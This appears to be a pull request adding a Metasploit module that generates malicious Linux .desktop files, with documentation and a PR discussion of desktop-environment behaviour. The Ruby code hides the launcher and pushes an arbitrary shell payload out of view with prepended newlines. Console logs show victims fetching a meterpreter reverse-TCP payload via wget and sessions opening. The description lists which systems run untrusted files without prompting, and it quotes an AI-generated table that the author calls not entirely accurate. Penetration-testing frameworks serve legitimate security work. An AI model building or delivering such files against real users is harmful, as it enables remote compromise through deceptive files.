### PR TITLE
Add Malicious XDG Desktop File module

### DIFF
--- a/documentation/modules/exploit/multi/fileformat/xdg_desktop.md
+++ b/documentation/modules/exploit/multi/fileformat/xdg_desktop.md
@@ -1,0 +1,122 @@
+## Vulnerable Application
+
+This module creates a malicious XDG Desktop (.desktop) file.
+
+On most modern systems, desktop files are not trusted by default.
+The user will receive a warning prompt that the file is not trusted
+when running the file, but may choose to run the file anyway.
+
+The default file manager applications in some desktop environments
+may impose more strict execution requirements by prompting the user
+to set the file as executable and/or marking the file as trusted
+before the file can be executed.
+
+
+## Options
+
+### FILENAME
+
+The desktop file name. (Default: `msf.desktop`)
+
+### APPLICATION_NAME
+
+The application name. Some file managers will display this name instead of the file name. (Default: random)
+
+
+## Advanced Options
+
+### PrependNewLines
+
+Prepend new lines before the payload. (Default: `100`)
+
+
+## Verification Steps
+
+On the Metasploit host:
+
+1. Start msfconsole
+1. Do: `use exploit/multi/fileformat/xdg_desktop`
+1. Do: `set filename [filename.desktop]`
+1. Do: `set payload [payload]`
+1. Do: `set lhost [lhost]`
+1. Do: `set lport [lport]`
+1. Do: `run`
+1. Do: `handler -p [payload] -P [lport] -H [lhost]`
+
+On the target machine:
+
+1. Open the `msf.desktop` file
+1. If prompted, choose "Launch Anyway"
+
+
+## Scenarios
+
+### Ubuntu MATE 24.04.2 (x86_64)
+
+```
+msf > use exploit/multi/fileformat/xdg_desktop
+[*] No payload configured, defaulting to cmd/linux/http/aarch64/meterpreter/reverse_tcp
+msf exploit(multi/fileformat/xdg_desktop) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(multi/fileformat/xdg_desktop) > set lhost 192.168.200.130
+lhost => 192.168.200.130
+msf exploit(multi/fileformat/xdg_desktop) > set lport 4444
+lport => 4444
+msf exploit(multi/fileformat/xdg_desktop) > set FETCH_COMMAND wget
+FETCH_COMMAND => WGET
+msf exploit(multi/fileformat/xdg_desktop) > run
+[+] msf.desktop stored at /root/.msf4/local/msf.desktop
+msf exploit(multi/fileformat/xdg_desktop) > handler -p cmd/linux/http/x64/meterpreter/reverse_tcp -P 4444 -H 192.168.200.130
+[*] Payload handler running as background job 0.
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+msf exploit(multi/fileformat/xdg_desktop) > 
+[*] Sending stage (3090404 bytes) to 192.168.200.193
+[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.193:52462) at 2025-07-29 03:29:10 -0400
+
+msf exploit(multi/fileformat/xdg_desktop) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer     : linuxmint-mate-24-04.2-desktop-amd64
+OS           : Ubuntu 24.04 (Linux 6.14.0-24-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+### Linux Mint 22.1 (MATE) (x86_64)
+
+```
+msf > use exploit/multi/fileformat/xdg_desktop 
+[*] No payload configured, defaulting to cmd/linux/http/aarch64/meterpreter/reverse_tcp
+msf exploit(multi/fileformat/xdg_desktop) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp 
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(multi/fileformat/xdg_desktop) > set lhost 192.168.200.130
+lhost => 192.168.200.130
+msf exploit(multi/fileformat/xdg_desktop) > set lport 4444
+lport => 4444
+msf exploit(multi/fileformat/xdg_desktop) > set FETCH_COMMAND wget
+FETCH_COMMAND => WGET
+msf exploit(multi/fileformat/xdg_desktop) > run
+[+] msf.desktop stored at /root/.msf4/local/msf.desktop
+msf exploit(multi/fileformat/xdg_desktop) > handler -p cmd/linux/http/x64/meterpreter/reverse_tcp -P 4444 -H 192.168.200.130
+[*] Payload handler running as background job 0.
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+msf exploit(multi/fileformat/xdg_desktop) > 
+[*] Sending stage (3090404 bytes) to 192.168.200.189
+[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.189:35162) at 2025-07-29 02:45:34 -0400
+
+msf exploit(multi/fileformat/xdg_desktop) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo 
+Computer     : 192.168.200.189
+OS           : LinuxMint 22.1 (Linux 6.8.0-51-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```

--- a/modules/exploits/multi/fileformat/xdg_desktop.rb
+++ b/modules/exploits/multi/fileformat/xdg_desktop.rb
@@ -1,0 +1,86 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Malicious XDG Desktop File',
+        'Description' => %q{
+          This module creates a malicious XDG Desktop (.desktop) file.
+
+          On most modern systems, desktop files are not trusted by default.
+          The user will receive a warning prompt that the file is not trusted
+          when running the file, but may choose to run the file anyway.
+
+          The default file manager applications in some desktop environments
+          may impose more strict execution requirements by prompting the user
+          to set the file as executable and/or marking the file as trusted
+          before the file can be executed.
+        },
+        'Author' => [
+          'bcoles'
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['ATT&CK', Mitre::Attack::Technique::T1204_002_MALICIOUS_FILE],
+          ['URL', 'https://specifications.freedesktop.org/desktop-entry-spec/latest/'],
+          ['URL', 'https://specifications.freedesktop.org/desktop-entry-spec/latest/exec-variables.html'],
+          ['URL', 'https://wiki.archlinux.org/title/Desktop_entries']
+        ],
+        'Platform' => %w[linux unix solaris freebsd],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [ 'Automatic', {} ]
+        ],
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'DisclosureDate' => '2007-02-06',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [SCREEN_EFFECTS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('FILENAME', [true, 'The desktop file name.', 'msf.desktop']),
+      OptString.new('APPLICATION_NAME', [false, 'The application name. Some file managers will display this name instead of the file name. (default is random)', '']),
+    ])
+
+    register_advanced_options([
+      OptInt.new('PrependNewLines', [false, 'Prepend new lines before the payload.', 100]),
+    ])
+  end
+
+  def application_name
+    datastore['APPLICATION_NAME'].blank? ? rand_text_alpha(6..12) : datastore['APPLICATION_NAME']
+  end
+
+  def exploit
+    values = [
+      'Type=Application',
+      "Name=#{application_name}",
+      # 'Hidden=true', # This property is not supported by old systems, which prevents execution
+      'NoDisplay=true',
+      'Terminal=false'
+    ]
+    desktop = "[Desktop Entry]\n"
+    desktop << values.shuffle.join("\n")
+    desktop << "\n"
+    desktop << "\n" * datastore['PrependNewLines']
+
+    escaped_payload = payload.encoded.gsub('\\', '\\\\\\').gsub('"', '\\"')
+    desktop << "Exec=/bin/sh -c \"#{escaped_payload}\""
+
+    file_create(desktop)
+  end
+end


### PR DESCRIPTION

This is unlikely to allow initial access without social engineering efforts, as:

* This is a well known technique likely to be flagged by mail filters and EDR.
* Users are warned\* that the file may be unsafe when opening the file.

Dropping this file somewhere conspicuous in a local exploitation scenario may be more successful.

However, it is nice to have another \*nix file exploit module which can be delivered and executed without\* requiring the user to first change the file attributes to executable (ie, `chmod +x`).

---

\* sometimes.

I tried opening a non-executable untrusted desktop file on a few different systems with mixed results:

* Linux Mint 22.1 (MATE), Ubuntu MATE 24.04.2 (MATE), and Solaris 10u11 (gnome) executed the file immediately without prompting;
* Linux Mint 20 (Cinnamon), Manjaro 21.3.7-220816 (XFCE), Manjaro 25.0.5-250713 (KDE), lubuntu 19.04 (LXQt), Kali Rolling (XFCE4), MidnightBSD 3.2.3 (XFCE4), GhostBSD 19.04 (MATE), and FreeBSD 14.2-RELEASE-p3 (XFCE4) advised that the file was untrusted, but allowed users to execute ("Launch anyway" / "Continue" / "Execute") without first setting the execute bit or setting the file as trusted;
* Manjaro 18.0.4 (KDE) and kubuntu 18.04 (KDE) prompted the user to "Execute" the file if the file was not executable, then prompted the user to confirm executing the program;
* Ubuntu 24.04 (gnome) refused to execute the file without first setting the execute bit and setting the file as trusted;
* RHEL 9.1 (gnome), Debian 11.7.0 (gnome), Debian 12.11.0 (gnome), Fedora Workstation 37 (gnome), and Ubuntu 20.04 (gnome) opened the file in a text editor by default.

FWIW; here's Copilot's summary for several Linux desktop environments:

<img width="701" height="436" alt="image" src="https://github.com/user-attachments/assets/7220d2cf-7bf4-43d6-8064-3c4532d4e6cd" />

More detailed Copilot summary (not entirely accurate as per my tests above):


<details>
<p>

# Differences by Desktop Environment

Below is an expanded overview of how popular Linux desktop environments handle `.desktop` files. It covers their default file managers, whether they require the executable bit, trust metadata, and how users mark files as trusted.

---

## Desktop-Environment Handling Summary

| Desktop Environment | File Manager               | Exec Flag Required | Trust Metadata Required | Trust Toggle UI                                | Notes                                                                       |
|---------------------|----------------------------|--------------------|-------------------------|-------------------------------------------------|-----------------------------------------------------------------------------|
| GNOME (3.30+)       | Nautilus                   | Yes                | Yes                     | Right-click → “Allow Launching”                 | Shows “Untrusted application launcher” banner if not trusted.               |
| KDE Plasma          | Dolphin                    | Yes                | No¹                     | Click banner → “Trust this launch file”         | Remembers trust per-file; no `metadata::trusted` under the hood.            |
| Xfce                | Thunar                     | Yes                | No                      | No UI; executable bit is enough                 | Won’t prompt about trust—just needs `chmod +x`.                             |
| LXQt                | PCManFM-Qt                 | Yes                | No                      | No UI; executable bit is enough                 | Very lightweight, minimal security prompts.                                 |
| LXDE                | PCManFM                    | Yes                | No                      | No UI; executable bit is enough                 | Same as LXQt but uses GTK2.                                                 |
| Cinnamon            | Nemo                       | Yes                | Yes²                    | Right-click → “Allow Launching”                 | Fork of Nautilus; mimics GNOME’s trust prompts.                             |
| MATE                | Caja                       | Yes                | No                      | No UI; executable flag is enough                 | Caja is GNOME-2 fork—trust metadata largely ignored.                        |
| Budgie              | Nemo                       | Yes                | Yes²                    | Right-click → “Allow Launching”                 | Same behavior as Cinnamon’s Nemo.                                           |
| Deepin              | Deepin File Manager        | Yes                | Yes                     | Right-click → “Trust this file”                 | Custom file manager; integrates trust toggle into context menu.             |
| Unity (deprecated)  | Nautilus Fork              | Yes                | Yes                     | Right-click → “Allow Launching”                 | Mirrors GNOME behavior; still present in Ubuntu 16.04 LTS legacy installs.  |
| Pantheon (Elementary)| Pantheon Files (Gala)     | Yes                | No                      | No trust toggle; exec bit is enough             | Designed for simplicity—relies solely on exec bit.                          |
| Tiling WMs (i3, Sway)| None (CLI/XDG tools)      | Yes                | N/A                     | N/A                                             | `.desktop` launchers must be invoked manually or via dmenu/rofi scripts.    |

¹ KDE Plasma trusts any executable `.desktop` file placed in recognized application directories (`~/.local/share/applications`, `/usr/share/applications`) without extra metadata.  
² Nemo respects the `metadata::trusted` flag (via GVfs) similar to Nautilus.

---

## Key Takeaways

- **Executable bit (`chmod +x`)** is universally required across all environments.
- **Trust metadata** (`gio set file.desktop metadata::trusted true`) is enforced mainly by GNOME‐based file managers (Nautilus, Nemo, Deepin FM).
- **UI toggles** appear only in those file managers that enforce metadata trust.
- **Lightweight DEs** (Xfce, LXDE, LXQt, Pantheon) skip trust metadata, relying entirely on the exec bit.
- **KDE Plasma** offers its own per-file trust remember mechanism without storing `metadata::trusted`.

---

## Automating Trust for Multiple Files

If you manage dozens of `.desktop` launchers, you can batch-trust them:

```bash
# Make all .desktop files in a folder executable
find ~/Downloads/desklets -name '*.desktop' -exec chmod +x {} \;

# Mark them trusted for GNOME/Nemo/Deepin
find ~/Downloads/desklets -name '*.desktop' \
  -exec gio set {} metadata::trusted true \;
```

For KDE Plasma, simply ensure they reside in `~/.local/share/applications` or `/usr/share/applications`, and Dolphin will treat them as trusted once executable.

</p>
</details>

